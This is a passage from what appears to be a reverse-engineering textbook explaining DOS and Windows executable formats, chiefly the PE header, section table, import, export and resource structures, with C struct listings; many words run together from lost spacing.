purpose as a modern 32-bit register. The downside was
that the offset registers were only 16-bit and, therefore,
sinceCOMfilescouldnotchangethesegmentregisters,
COMfileswerelimitedtousing64KofRAM.Thegood
thing about this approach, however, was that no extra
work was needed by DOS to load and run a COM file:
justloadthefile,setthesegmentregister,andjumptoit.
(Theprogramscouldperform'near'jumpsbyjustgiving
anoffsettojumpto.)
COM files are loaded into RAM at offset $100. The
space before that would be used for passing data to and
from DOS (for example, the contents of the command
lineusedtoinvoketheprogram).
Note that COM files, by definition, cannot be 32-bit.
Windows provides support for COM files via a special
CPUmode.
2.2.2 MS-DOSEXEFiles
OnewayMS-DOScompilersgotaroundthe64Kmem-
ory limitation was with the introduction of memory
models. Thebasicconceptistocleverlysetdifferentseg-
mentregistersinthex86CPU(CS,DS,ES,SS)topoint
to the same or different segments, thus allowing varying
degrees of access to memory. Typical memory models
were:
tinyAll memory accesses are 16-bit (segment registers
unchanged). Produces a .COM file instead of an
.EXEfile.
smallAllmemoryaccessesare16-bit(segmentregisters
unchanged).
compactData addresses include both segment and off-
set, reloading the DS or ES registers on access and
allowing up to 1M of data. Code accesses don't
changetheCSregister,allowing64Kofcode.
mediumCode addresses include the segment address,
reloading CS on access and allowing up to 1M of
code. Data accesses don't change the DS and ES
registers,allowing64Kofdata.
largeBothcodeanddataaddressesare(segment,offset)
pairs, alwaysreloadingthesegmentaddresses. The
whole 1M byte memory space is available for both
codeanddata.
hugeSameasthelargemodel,withadditionalarithmetic
being generated by the compiler to allow access to
arrayslargerthan64K.
2.2. WINDOWS EXECUTABLE FILES 23
When looking at an EXE file, one has to decide which
memorymodelwasusedtobuildthatfile.
2.2.3 PEFiles
APortableExecutable (PE) file is the standard binary
fileformatforanExecutableorDLLunderWindowsNT,
Windows 95, and Win32. The Win32 SDK contains a
file,winnt.h,whichdeclaresvariousstructsandvariables
usedinthePEfiles. SomefunctionsformanipulatingPE
filesarealsoincludedin imagehlp.dll . PEfilesarebroken
downintovarioussectionswhichcanbeexamined.
2.2.4 RelativeVirtualAddressing(RVA)
In a Windows environment, executable modules can be
loaded at any point in memory, and are expected to
run without problem. To allow multiple programs to be
loadedatseeminglyrandomlocationsinmemory,PEfiles
have adopted a tool called RVA: Relative Virtual Ad-
dresses. RVAs assume that the “base address” of where
amoduleisloadedintomemoryisnotknownatcompile
time. So, PEfilesdescribethelocationofdatainmem-
oryasan offset from the base address ,whereverthatmay
beinmemory.
Someprocessorinstructionsrequirethecodeitselftodi-
rectlyidentifywhereinmemorysomedatais. Thisisnot
possible when the location of the module in memory is
notknownatcompiletime. Thesolutiontothisproblem
isdescribedinthesectionon“Relocations”.
It is important to remember that the addresses obtained
from a disassembly of a module will not always match
uptotheaddressesseeninadebuggerastheprogramis
running.
2.2.5 FileFormat
ThePEportableexecutablefileformatincludesanumber
ofinformationalheaders,andisarrangedinthefollowing
format:
ThebasicformatofaMicrosoftPEfile
MS-DOSheader
Open any Win32 binary executable in a hex editor, and
note what you see: The first 2 letters are alwaysthe let-
ters “MZ”, the initials of Mark Zbikowski, who created
the first linker for DOS. To some people, the first few
bytes in a file that determine the type of file are called
the“magicnumber,”althoughthisbookwillnotusethat
term,becausethereisnorulethatstatesthatthe“magic
number” needs to be a single number. Instead, we will
use the term “File ID Tag”, or simply, File ID. Some-
timesthisisalsoknownasFileSignature.
After the File ID, the hex editor will show several bytes
ofeitherrandom-lookingsymbols,orwhitespace,before
the human-readable string “This program cannot be run
inDOSmode”.
Whatisthis?
24 CHAPTER 2. PLATFORMS
HexListingofanMS-DOSfileheader
What you are looking at is the MS-DOS header of the
Win32 PE file. To ensure either a) backwards compati-
bility,orb)gracefuldeclineofnewfiletypes,Microsoft
has written a series of machine instructions(an example
program is listed below the DOS header structure) into
theheadofeachPEfile. Whena32-bitWindowsfileis
run in a 16-bit DOS environment, the program will dis-
play the error message: “This program cannot be run in
DOSmode.”,thenterminate.
The DOS header is also known by some as the EXE
header. Here is the DOS header presented as a C data
structure:
struct DOS_Header { // short is 2 bytes, long is 4
bytes char signature[2] = “MZ"; short lastsize; short
nblocks; short nreloc; short hdrsize; short minalloc;
short maxalloc; void *ss; // 2 byte value void *sp; //
2 byte value short checksum; void *ip; // 2 byte value
void *cs; // 2 byte value short relocpos; short noverlay;
short reserved1[4]; short oem_id; short oem_info; short
reserved2[10]; long e_lfanew; // Offset to the 'PE\0\0'
signaturerelativetothebeginningofthefile}
AftertheDOSheaderthereisastubprogrammentioned
intheparagraphabovetheDOSheaderstructure. Listed
below is a commented example of that program, it was
takenfromaprogramcompiledwithGCC.
;# Using NASM with Intel syntax push cs ;# Push CS
onto the stack pop ds ;# Set DS to CS mov dx,message
; point to our message “This program cannot be run
in DOS mode.”, 0x0d, 0x0d, 0x0a, '$' mov ah, 09 int
0x21;#whenAH=9,DOSinterrupttowriteastring;#
terminatetheprogrammovax,0x4c01int0x21message
db “This program cannot be run in DOS mode.”, 0x0d,
0x0d,0x0a,'$'
PEHeader
At offset 60 (0x3C) from the beginning of the DOS
header is a pointer to the Portable Executable (PE) File
header(e_lfanewinMZstructure). DOSwillprinttheer-
rormessageandterminate,butWindowswillfollowthis
pointertothenextbatchofinformation.
HexListingofaPEsignature,andthepointertoit
ThePEheaderconsistsonlyofaFileIDsignature,with
thevalue“PE\0\0”whereeach'\0'characterisanASCII
NULcharacter. Thissignatureshowsthata)thisfileisa
legitimatePEfile,andb)thebyteorderofthefile. Byte
order will not be considered in this chapter, and all PE
filesareassumedtobein“littleendian”format.
The first big chunk of information lies in the COFF
header,directlyafterthePEsignature.
COFFHeader
The COFF header is present in both COFF object files
(beforetheyarelinked)andinPEfileswhereitisknown
asthe“Fileheader”. TheCOFFheaderhassomeinfor-
mationthatisusefultoanexecutable,andsomeinforma-
tionthatismoreusefultoanobjectfile.
HereistheCOFFheader,presentedasaCdatastructure:
struct COFFHeader { short Machine; short Num-
berOfSections; long TimeDateStamp; long Point-
erToSymbolTable; long NumberOfSymbols; short
SizeOfOptionalHeader;shortCharacteristics;}
Machine This field determines what machine the file
was compiled for. A hex value of 0x14C (332 in
decimal)isthecodeforanIntel80386.
Here’salistofpossiblevaluesitcanhave.
NumberOfSections The number of sections that are
describedattheendofthePEheaders.
TimeDateStamp 32 bit time at which this header was
generated: is used in the process of “Binding”, see
below.
SizeOfOptionalHeader this field shows how long the
“PE Optional Header” is that follows the COFF
header.
Characteristics This is a field of bit flags, that show
somecharacteristicsofthefile.
2.2. WINDOWS EXECUTABLE FILES 25
PEOptionalHeader
The “PE Optional Header” is not “optional” per se, be-
cause it is required in Executable files, but not in COFF
object files. There are two different versions of the op-
tional header depending on whether or not the file is 64
bitor32bit. TheOptionalheaderincludeslotsandlotsof
information that can be used to pick apart the file struc-
ture,andobtainsomeusefulinformationaboutit.
ThePEOptionalHeaderoccursdirectlyaftertheCOFF
header, and some sources even show the two headers as
beingpartofthesamestructure. Thiswikibookseparates
themoutforconvenience.
Here is the 64 bit PE Optional Header presented as a C
datastructure:
struct PEOptHeader { /* 64 bit version of
the PE Optional Header also known as IM-
AGE_OPTIONAL_HEADER64 char is 1 byte short
is 2 bytes long is 4 bytes long long is 8 bytes */ short
signature; //decimal number 267 for 32 bit, 523 for 64
bit, and 263 for a ROM image. char MajorLinkerVer-
sion; char MinorLinkerVersion; long SizeOfCode; long
SizeOfInitializedData; long SizeOfUninitializedData;
longAddressOfEntryPoint;//TheRVAofthecodeentry
point long BaseOfCode; /*The next 21 fields are an ex-
tension to the COFF optional header format*/ long long
ImageBase;longSectionAlignment;longFileAlignment;
short MajorOSVersion; short MinorOSVersion; short
MajorImageVersion; short MinorImageVersion; short
MajorSubsystemVersion; short MinorSubsystemVer-
sion; long Win32VersionValue; long SizeOfImage;
long SizeOfHeaders; long Checksum; short Subsystem;
short DLLCharacteristics; long long SizeOfStack-
Reserve; long long SizeOfStackCommit; long long
SizeOfHeapReserve; long long SizeOfHeapCom-
mit; long LoaderFlags; long NumberOfRvaAndSizes;
data_directory DataDirectory[NumberOfRvaAndSizes];
//Can have any number of elements, matching the
number in NumberOfRvaAndSizes. } //However, it is
always16inPEfiles.
Thisisthe32bitversionofthePEOptionalHeaderpre-
sentedasaCdatastructure:
struct PEOptHeader { /* 32 bit version of
the PE Optional Header also known as IM-
AGE_OPTIONAL_HEADER char is 1 byte short is 2
byteslongis4bytes*/shortsignature;//decimalnumber
267for32bit,523for64bit,and263foraROMimage.
char MajorLinkerVersion; char MinorLinkerVersion;
long SizeOfCode; long SizeOfInitializedData; long
SizeOfUninitializedData; long AddressOfEntryPoint;
//The RVA of the code entry point long BaseOfCode;
long BaseOfData; /*The next 21 fields are an extension
to the COFF optional header format*/ long Image-
Base; long SectionAlignment; long FileAlignment;
short MajorOSVersion; short MinorOSVersion; shortMajorImageVersion; short MinorImageVersion; short
MajorSubsystemVersion; short MinorSubsystemVer-
sion; long Win32VersionValue; long SizeOfImage;
long SizeOfHeaders; long Checksum; short Subsystem;
short DLLCharacteristics; long SizeOfStackReserve;
long SizeOfStackCommit; long SizeOfHeapReserve;
long SizeOfHeapCommit; long LoaderFlags; long
NumberOfRvaAndSizes; data_directory DataDirec-
tory[NumberOfRvaAndSizes]; //Can have any number
of elements, matching the number in NumberOfR-
vaAndSizes. }//However,itisalways16inPEfiles.
This is the data_directory(also known as IM-
AGE_DATA_DIRECTORY) structure as found in
thetwostructuresabove:
/*longis4bytes*/structdata_directory{longVirtual-
Address;longSize;}
Signature Contains a signature that identifies the im-
age.
MajorLinkerVersion Themajorversionnumberofthe
linker.
MinorLinkerVersion The minor version number of
thelinker.
SizeOfCode The size of the code section, in bytes, or
thesumofallsuchsectionsiftherearemultiplecode
sections.
SizeOfInitializedData The size of the initialized data
section, in bytes, or the sum of all such sections if
therearemultipleinitializeddatasections.
SizeOfUninitializedData Thesizeoftheuninitialized
datasection,inbytes,orthesumofallsuchsections
iftherearemultipleuninitializeddatasections.
AddressOfEntryPoint A pointer to the entry point
function,relativetotheimagebaseaddress. Forex-
ecutablefiles,thisisthestartingaddress. Fordevice
drivers,thisistheaddressoftheinitializationfunc-
tion. TheentrypointfunctionisoptionalforDLLs.
Whennoentrypointispresent,thismemberiszero.
BaseOfCode A pointer to the beginning of the code
section,relativetotheimagebase.
BaseOfData Apointertothebeginningofthedatasec-
tion,relativetotheimagebase.
ImageBase Thepreferredaddressofthefirstbyteofthe
imagewhenitisloadedinmemory. Thisvalueisa
multipleof64Kbytes. ThedefaultvalueforDLLs
is 0x10000000. The default value for applications
is 0x00400000, except on Windows CE where it is
0x00010000.
26 CHAPTER 2. PLATFORMS
SectionAlignment Thealignmentofsectionsloadedin
memory, in bytes. This value must be greater than
orequaltotheFileAlignmentmember. Thedefault
valueisthepagesizeforthesystem.
FileAlignment The alignment of the raw data of sec-
tionsintheimagefile,inbytes. Thevalueshouldbe
apowerof2between512and64K(inclusive). The
default is 512. If the SectionAlignment member is
lessthanthesystempagesize,thismembermustbe
thesameasSectionAlignment.
MajorOSVersion Themajorversionnumberofthere-
quiredoperatingsystem.
MinorOSVersion Theminorversionnumberofthere-
quiredoperatingsystem.
MajorImageVersion Themajorversionnumberofthe
image.
MinorImageVersion Theminorversionnumberofthe
image.
MajorSubsystemVersion The major version number
ofthesubsystem.
MinorSubsystemVersion The minor version number
ofthesubsystem.
Win32VersionValue This member is reserved and
mustbe0.
SizeOfImage The size of the image, in bytes, includ-
ingallheaders. MustbeamultipleofSectionAlign-
ment.
SizeOfHeaders The combined size of the following
items, rounded to a multiple of the value specified
intheFileAlignmentmember.
e_lfanewmemberofDOS_Header
4bytesignature
sizeofCOFFHeader
sizeofoptionalheader
sizeofallsectionheaders
CheckSum The image file checksum. The following
filesarevalidatedatloadtime: alldrivers,anyDLL
loadedatboottime,andanyDLLloadedintoacrit-
icalsystemprocess.
Subsystem The Subsystem that will be invoked to run
theexecutable
DLLCharacteristics The DLL characteristics of the
imageSizeOfStackReserve The number of bytes to reserve
for the stack. Only the memory specified by the
SizeOfStackCommit member is committed at load
time; the rest is made available one page at a time
untilthisreservesizeisreached.
SizeOfStackCommit The number of bytes to commit
forthestack.
SizeOfHeapReserve The number of bytes to reserve
forthelocalheap. Onlythememoryspecifiedbythe
SizeOfHeapCommit member is committed at load
time; the rest is made available one page at a time
untilthisreservesizeisreached.
SizeOfHeapCommit The number of bytes to commit
forthelocalheap.
LoaderFlags Thismemberisobsolete.
NumberOfRvaAndSizes Thenumberofdirectoryen-
tries in the remainder of the optional header. Each
entrydescribesalocationandsize.
DataDirectory Possibly the most interesting member
of this structure. Provides RVAs and sizes which
locate various data structures, which are used for
setting up the execution environment of a module.
ThedatastructuresthatthearrayofDataDirectory
pointstocanbefoundinthevarioussectionsofthe
file as pointed to by the Section Table . The details
ofwhatthesestructuresdoexistinothersectionsof
this page. The most interesting entries in DataDi-
rectoryareasfollows,ExportDirectory,ImportDi-
rectory,ResourceDirectory,andtheBoundImport
directory. Notethattheoffsetsinbytesarerelative
tothebeginningoftheoptionalheader.
2.2.6 SectionTable
ImmediatelyafterthePEOptionalHeaderwefindasec-
tion table. The section table consists of an array of IM-
AGE_SECTION_HEADER structures. The number of
structures that we find in the file are determined by the
memberNumberOfSectionsintheCOFFHeader. Each
structure is 40 bytes in length. Pictured below is a hex
dumpfromaprogramIamwritingdepictingthesection
table:
2.2. WINDOWS EXECUTABLE FILES 27
TheoutlinedareascorrelatetotheNamememberof
threeIMAGE_SECTION_HEADERstructures
TheIMAGE_SECTION_HEADERdefinedasaCstruc-
tureisasfollows:
struct IMAGE_SECTION_HEADER { //
short is 2 bytes // long is 4 bytes char
Name[IMAGE_SIZEOF_SHORT_NAME]; // IM-
AGE_SIZEOF_SHORT_NAMEis8bytesunion{long
PhysicalAddress;longVirtualSize;}Misc;longVirtual-
Address;longSizeOfRawData;longPointerToRawData;
longPointerToRelocations;longPointerToLinenumbers;
short NumberOfRelocations; short NumberOfLinenum-
bers;longCharacteristics;}
Name8-bytenull-paddedUTF-8string(thestringmay
not be null terminated if all 8 characters are used).
For longer names, this member will contain '/' fol-
lowedbyanASCIIrepresentationofadecimalnum-
berthatisanoffsetintothestringtable. Executable
imagesdonotuseastringtableanddonotsupport
sectionnamesgreaterthan8characters.
MiscPhysicalAddress -Thefileaddress.
VirtualSize -Thetotalsizeofthesectionwhenloaded
into memory, in bytes. If this value is greater than
the SizeOfRawData member, the section is filled
with zeroes. This field is valid only for executable
imagesandshouldbesetto0forobjectfiles.
The Misc member should be considered unreliable un-
lessthelinkerandthebehaviorofthelinkerthatwas
usedisknown.
VirtualAddress Theaddressofthefirstbyteofthesec-
tionwhenloadedintomemory,relativetotheimage
base. Forobjectfiles,thisistheaddressofthefirst
bytebeforerelocationisapplied.
SizeOfRawData The size of the initialized data on
disk,inbytes. ThisvaluemustbeamultipleoftheFileAlignment member of the PE Optional Header
structure. If this value is less than the VirtualSize
member, the remainder of the section is filled with
zeroes. If the section contains only uninitialized
data,thevalueis0.
PointerToRawData Afilepointerrelativetothebegin-
ningofthefiletothefirstpagewithintheCOFFfile.
ThisvaluemustbeamultipleoftheFileAlignment
member of the PE Optional Header structure. If
a section contains only uninitialized data this value
shouldbe0.
PointerToRelocations A file pointer to the beginning
oftherelocationentriesforthesection. Ifthereare
norelocations,thisvalueis0.
PointerToLinenumbers Afilepointertothebeginning
of the line-number entries for the section. If there
arenoCOFFlinenumbers,thisvalueis0.
NumberOfRelocations The number of relocation en-
tries for the section. This value is 0 for executable
images.
NumberOfLinenumbers The number of line-number
entriesforthesection.
Characteristics Thecharacteristicsoftheimage.
The table below defines the possible 32-bit mask values
forthismember:
APEloaderwillplacethesectionsoftheexecutableim-
ageatthelocationsspecifiedbythesesectiondescriptors
(relativetothebaseaddress)andusuallythealignmentis
0x1000,whichmatchesthesizeofpagesonthex86.
Commonsectionsare:
1..text/.code/CODE/TEXT - Contains executable
code(machineinstructions)
2..textbss/TEXTBSS-PresentifIncrementalLinking
isenabled
3..data/.idata/DATA/IDATA - Contains initialised
data
4..bss/BSS-Containsuninitialiseddata
5..rsrc-Containsresourcedata
2.2.7 Imports and Exports - Linking to
othermodules
28 CHAPTER 2. PLATFORMS
Whatislinking?
Wheneveradeveloperwritesaprogram,thereareanum-
berofsubroutinesandfunctionswhichareexpectedtobe
implementedalready,savingthewriterthehassleofhav-
ing to write out more code or work with complex data
structures. Instead, the coder need only declare one call
tothesubroutine,andthelinkerwilldecidewhathappens
next.
Therearetwotypesoflinkingthatcanbeused: staticand
dynamic. Staticusesalibraryofprecompiledfunctions.
Thisprecompiledcodecanbeinsertedintothefinalexe-
cutabletoimplementafunction,savingtheprogrammer
alotoftime. Incontrast,dynamiclinkingallowssubrou-
tine code to reside in a different file (or module), which
isloadedatruntimebytheoperatingsystem. Thisisalso
known as a “Dynamically linked library”, or DLL. A li-
braryisamodulecontainingaseriesoffunctionsorval-
uesthatcanbe exported. Thisisdifferentfromtheterm
executable,which importsthingsfromlibrariestodowhat
it wants. From here on, “module” means any file of PE
format,anda“Library”isanymodulewhichexportsand
importsfunctionsandvalues.
Dynamicallylinkinghasthefollowingbenefits:
Itsavesdiskspace,ifmorethanoneexecutablelinks
tothelibrarymodule
Allowsinstantupdatingofroutines,withoutprovid-
ingnewexecutablesforallapplications
Cansavespaceinmemorybymappingthecodeof
alibraryintomorethanoneprocess
Increases abstraction of implementation. The
methodbywhichanactionisachievedcanbemod-
ified without the need for reprogramming of appli-
cations. Thisisextremelyusefulforbackwardcom-
patibilitywithoperatingsystems.
ThissectiondiscusseshowthisisachievedusingthePE
fileformat. Animportantpointtonoteatthispointisthat
anythingcanbeimportedorexportedbetweenmodules,
includingvariablesaswellassubroutines.
Loading
Thedownsideofdynamicallylinkingmodulestogetheris
that, at runtime, the software which is initialising an ex-
ecutable must link these modules together. For various
reasons,youcannotdeclarethat“Thefunctioninthisdy-
namic library will always exist in memory here". If that
memory address isunavailable orthe libraryis updated,
thefunctionwillnolongerexistthere,andtheapplication
tryingtouseitwillbreak. Instead,eachmodule(library
orexecutable)mustdeclarewhatfunctionsorvaluesit ex-
portstoothermodules,andalsowhatitwishesto import
fromothermodules.Assaidabove,amodulecannotdeclarewhereinmemory
it expects a function or value to be. Instead, it declares
where in its own memory it expects to find a pointerto
the value it wishes to import. This permits the module
to address any imported value, wherever it turns up in
memory.
2.2.8 Exports
Exportsare functions and values in one module that
have been declared to be shared with other modules.
This is done through the use of the “Export Direc-
tory”, which is used to translate between the name of
an export (or “Ordinal”, see below), and a location in
memory where the code or data can be found. The
start of the export directory is identified by the IM-
AGE_DIRECTORY_ENTRY_EXPORT entry of the
resourcedirectory. Allexportdatamustexistinthesame
section. The directory is headed by the following struc-
ture:
struct IMAGE_EXPORT_DIRECTORY { long Char-
acteristics; long TimeDateStamp; short MajorVersion;
short MinorVersion; long Name; long Base; long
NumberOfFunctions; long NumberOfNames; long
*AddressOfFunctions; long *AddressOfNames; long
*AddressOfNameOrdinals;}
The “Characteristics” value is generally unused, Time-
DateStamp describes the time the export directory was
generated, MajorVersion and MinorVersion should de-
scribe the version details of the directory, but their na-
ture is undefined. These values have little or no impact
on the actual exports themselves. The “Name” value is
an RVA to a zero terminated ASCII string, the name of
thislibraryname,ormodule.
NamesandOrdinals Eachexportedvaluehasbotha
nameandan“ordinal”(akindofindex). Theactualex-
portsthemselvesaredescribedthroughAddressOfFunc-
tions,whichisanRVAtoanarrayofRVAs,eachpointing
to a different function or value to be exported. The size
ofthisarrayisinthevalueNumberOfFunctions. Eachof
thesefunctionshasanordinal. The“Base”valueisused
astheordinalofthefirstexport,andthenextRVAinthe
arrayisBase+1,andsoforth.
EachentryintheAddressOfFunctionsarrayisidentified
by a name, found through the RVA AddressOfNames.
ThedatawhereAddressOfNamespointstoisanarrayof
RVAs, of the size NumberOfNames. Each RVA points
to a zero terminated ASCII string, each being the name
ofanexport. Thereisalsoasecondarray,pointedtoby
theRVAinAddressOfNameOrdinals. Thisisalsoofsize
NumberOfNames, but each value is a 16 bit word, each
valuebeinganordinal. Thesetwoarraysareparalleland
areusedtogetanexportvaluefromAddressOfFunctions.
Tofindanexportbyname,searchtheAddressOfNames
2.2. WINDOWS EXECUTABLE FILES 29
arrayforthecorrectstringandthentakethecorrespond-
ingvaluefromtheAddressOfNameOrdinalsarray. This
value is then used as index to AddressOfFunctions (yes,
it’s 0-based index actually, NOT base-biased ordinal, as
theofficialdocumentationsuggests!).
Forwarding Aswellasbeingabletoexportfunctions
andvaluesinamodule,theexportdirectorycan forward
anexporttoanotherlibrary. Thisallowsmoreflexibility
whenre-organisinglibraries: perhapssomefunctionality
hasbranchedintoanothermodule. Ifso,anexportcanbe
forwarded to that library, instead of messy reorganising
insidetheoriginalmodule.
Forwarding is achieved by making an RVA in the Ad-
dressOfFunctionsarraypointintothesectionwhichcon-
tains the export directory, something that normal ex-
ports should not do. At that location, there should
be a zero terminated ASCII string of format “Library-
Name.ExportName”fortheappropriateplacetoforward
thisexportto.
2.2.9 Imports
Theotherhalfofdynamiclinkingisimportingfunctions
and values into an executable or other module. Before
runtime, compilers and linkers do not know where in
memory a value that needs to be imported could exist.
Theimporttablesolvesthisbycreatinganarrayofpoint-
ersatruntime,eachonepointingtothememorylocation
ofanimportedvalue. Thisarrayofpointersexistsinside
ofthemoduleatadefinedRVAlocation. Inthisway,the
linker can use addresses inside of the module to access
valuesoutsideofit.
TheImportdirectory
The start of the import directory is pointed to by
boththeIMAGE_DIRECTORY_ENTRY_IATandIM-
AGE_DIRECTORY_ENTRY_IMPORT entries of the
resource directory (the reason for this is uncer-
tain). At that location, there is an array of IM-
AGE_IMPORT_DESCRIPTOR structures. Each of
theseidentifyalibraryormodulethathasavalueweneed
toimport. Thearraycontinuesuntilanentrywhereallthe
valuesarezero. Thestructureisasfollows:
struct IMAGE_IMPORT_DESCRIPTOR { long
*OriginalFirstThunk; long TimeDateStamp; long For-
warderChain;longName;long*FirstThunk;}
The TimeDateStamp is relevant to the act of “Binding”,
seebelow. TheNamevalueisanRVAtoanASCIIstring,
naming the library to import. ForwarderChain will be
explained later. The only thing of interest at this point,
aretheRVAsOriginalFirstThunkandFirstThunk. Both
thesevaluespointtoarraysofRVAs,eachofwhichpointtoaIMAGE_IMPORT_BY_NAMESstruct. Thearrays
areterminatedwithanentrythatisequaltozero. These
twoarraysareparallelandpointtothesamestructure,in
thesameorder. Thereasonforthiswillbecomeapparent
shortly.
Each of these IMAGE_IMPORT_BY_NAMES structs
hasthefollowingform:
struct IMAGE_IMPORT_BY_NAME { short Hint;
charName[1];}
“Name” is an ASCII string of any size that names the
value to be imported. This is used when looking up a
valueintheexportdirectory(seeabove)throughtheAd-
dressOfNames array. The “Hint” value is an index into
theAddressOfNamesarray;tosavesearchingforastring,
theloaderfirstcheckstheAddressOfNamesentrycorre-
spondingto“Hint”.
To summarise: The import table consists of a large ar-
ray of IMAGE_IMPORT_DESCRIPTORs, terminated
byanall-zeroentry. Thesedescriptorsidentifyalibrary
toimportthingsfrom. TherearethentwoparallelRVA
arrays,eachpointingatIMAGE_IMPORT_BY_NAME
structures,whichidentifyaspecificvaluetobeimported.
Importsatruntime
Using the above import directory at runtime, the loader
finds the appropriate modules, loads them into mem-
ory, and seeks the correct export. However, to be able
to use the export, a pointer to it must be stored some-
where in the importing module’s memory. This is why
there are two parallel arrays, OriginalFirstThunk and
FirstThunk,identifyingIMAGE_IMPORT_BY_NAME
structures. Once an imported value has been resolved,
thepointertoitisstoredintheFirstThunkarray. Itcan
thenbeusedatruntimetoaddressimportedvalues.
Boundimports
ThePEfileformatalsosupportsapeculiarfeatureknown
as“binding”. Theprocessofloadingandresolvingimport
addressescanbetimeconsuming,andinsomesituations
this is to be avoided. If a developer is fairly certain that
alibraryisnotgoingtobeupdatedorchanged,thenthe
addressesinmemoryofimportedvalueswillnotchange
each time the application is loaded. So, the import ad-
dress can be precomputed and stored in the FirstThunk
array beforeruntime, allowing the loader to skip resolv-
ing the imports - the imports are “bound” to a particu-
lar memory location. However, if the versions numbers
between modules do not match, or the imported library
needs to be relocated, the loader will assume the bound
addressesareinvalid,andresolvetheimportsanyway.
The “TimeDateStamp” member of the import directory
entry for a module controls binding; if it is set to zero,
30 CHAPTER 2. PLATFORMS
thentheimportdirectoryisnotbound. Ifitisnon-zero,
thenitisboundtoanothermodule. However,theTime-
DateStampintheimporttablemustmatchtheTimeDat-
eStampintheboundmodule’sFileHeader,otherwisethe
boundvalueswillbediscardedbytheloader.
Forwardingandbinding Bindingcanofcoursebea
problemiftheboundlibrary/moduleforwardsitsexports
toanothermodule. Inthesecases,thenon-forwardedim-
ports can be bound, but the values which get forwarded
must be identified so the loader can resolve them. This
is done through the ForwarderChain member of the im-
portdescriptor. Thevalueof“ForwarderChain”isanin-
dex into the FirstThunk and OriginalFirstThunk arrays.
TheOriginalFirstThunkforthatindexidentifiestheIM-
AGE_IMPORT_BY_NAMEstructureforaimportthat
needstoberesolved,andtheFirstThunkforthatindexis
theindexofanotherentrythatneedstoberesolved. This
continuesuntiltheFirstThunkvalueis  1,indicatingno
moreforwardedvaluestoimport.
2.2.10 Resources
Resources are data items in modules which are difficult
tobestoredordescribedusingthechosenprogramming
language. This requires a separate compiler or resource
builder,allowinginsertionofdialogboxes,icons,menus,
images,andothertypesofresources,includingarbitrary
binary data. Although a number of Resource API calls
can be used to retrieve resources from a PE file we are
going to look at the resources without the use of those
APIs.
LocatingtheResourceSection
The first thing we need to do when we want to
manually manipulate a file’s resources is to find
the resource section. To do this we need some
information found in the DataDirectory array and
the Section Table. We need the RVA stored
in the VirtualAddress member of the DataDirec-
tory[IMAGE_DIRECTORY_ENTRY_RESOURCE]
structure found in the PE Optional Header.
Once the RVA is known we can then lookup
that RVA in the Section Table by comparing
the VirtualAddress member of the DataDirec-
tory[IMAGE_DIRECTORY_ENTRY_RESOURCE]
structure with the VirtualAddress member of an IM-
AGE_SECTION_HEADER. Except in rare cases, the
VirtualAddress member of the DataDirectory structure
will equal the value of the VirtualAddress member of
an IMAGE_SECTION_HEADER. The name member
of that particular IMAGE_SECTION_HEADER will
except in rare cases be named, '.rsrc'. Once the correct
IMAGE_SECTION_HEADER structure is found the
PointerToRawData member can be used to locate theresource section. The PointerToRawData member con-
tainsanoffsetfromthebeginningofthefilethatwilllead
youtothefirstbyteoftheresourcesection. Thepicture
below depicts an example of a DataDirectory array on
the left with an IMAGE_SECTION_HEADER on the
right populated with the information for the resource
section. We can see the highlighted line underneath of
Directory Information '2 RVA: 20480 Size: 3512' has a
VirtualAddress(RVA) of 20480, this corresponds to the
VirtualAddress of 20480 for the .rsrc(resource) section.
You can also see that the value of PointerToRawData
is equal to 7168. In this particular PE file we will find
the resource section starting at offset 7168 from the
beginningofthefile.
Once the resource section is found we can start looking
atthestructuresanddatacontainedinthatsection.
Resourcestructures
The IMAGE_RESOURCE_DIRECTORY is the very
firststructurewecomeacrossanditstartsatthe1stbyte
oftheresourcesection.
IMAGE_RESOURCE_DIRECTORYstructure:
struct IMAGE_RESOURCE_DIRECTORY { long
Characteristics; long TimeDateStamp; short MajorVer-
sion; short MinorVersion; short NumberOfNamedEn-
tries;shortNumberOfIdEntries;}
Characteristics is unused, and TimeDateStamp is nor-
mally the time of creation, although it doesn't matter
if it’s set or not. MajorVersion and MinorVersion re-
late to the versioning info of the resources: the fields
have no defined values. Immediately following the IM-
AGE_RESOURCE_DIRECTORY structure is a series
ofIMAGE_RESOURCE_DIRECTORY_ENTRYs,the
2.2. WINDOWS EXECUTABLE FILES 31
numberofwhicharedefinedbythetotalofNumberOf-
NamedEntries and NumberOfIdEntries. The first por-
tion of these entries are for named resources, the latter
for ID resources, depending on the values in the IM-
AGE_RESOURCE_DIRECTORY struct. The actual
shapeoftheresourceentrystructureisasfollows:
structIMAGE_RESOURCE_DIRECTORY_ENTRY{
longNameId;long*Data;}
The NameId value has dual purpose: if the most signif-
icant bit (or sign bit) is clear, then the lower 16 bits are
an ID number of the resource. Alternatly, if the top bit
is set, then the lower 31 bits make up an offset from the
startoftheresourcedatatothenamestringofthispartic-
ularresource. TheDatavaluealsohasadualpurpose: if
themostsignificantbitisset,theremaining31bitsform
an offset from the start of the resource data to another
IMAGE_RESOURCE_DIRECTORY (i.e. this entry is
aninteriornodeoftheresourcetree). Otherwise,thisis
a leaf node, and Data contains the offset from the start
of the resource data to a structure which describes the
specificsoftheresourcedataitself(whichcanbeconsid-
eredtobeanorderedstreamofbytes):
struct IMAGE_RESOURCE_DATA_ENTRY { long
*Data;longSize;longCodePage;longReserved;}
The Data value contains an RVA to the actual resource
data, Size is self-explanatory, and CodePage contains
theUnicodecodepagetobeusedfordecodingUnicode-
encodedstringsintheresource(ifany). Reservedshould
besetto0.
Layout
The above system of resource directory and entries al-
lows simple storage of resources, by name or ID num-
ber. However,thiscangetverycomplicatedveryquickly.
Different types of resources, the resources themselves,
andinstancesofresourcesinotherlanguagescanbecome
muddledinjustonedirectoryofresources. Forthisrea-
son, the resource directory has been given a structure to
workby,allowingseparationofthedifferentresources.
For this purpose, the “Data” value of resource entries
points at another IMAGE_RESOURCE_DIRECTORY
structure,formingatree-diagramlikeorganisationofre-
sources. The first level of resource entries identifies the
typeof the resource: cursors, bitmaps, icons and simi-
lar. They use the ID method of identifying the resource
entries,ofwhichtherearetwelvedefinedvaluesintotal.
Moreuserdefinedresourcetypescanbeadded. Eachof
theseresourceentriespointsataresourcedirectory,nam-
ingtheactualresourcesthemselves. Thesecanbeofany
name or value. These point at yet another resource di-
rectory,whichusesIDnumberstodistinguishlanguages,
allowing different specific resources for systems using adifferent language. Finally, the entries in the language
directory actually provide the offset to the resource data
itself,theformatofwhichisnotdefinedbythePEspeci-
ficationandcanbetreatedasanarbitrarystreamofbytes.
2.2.11 Relocations
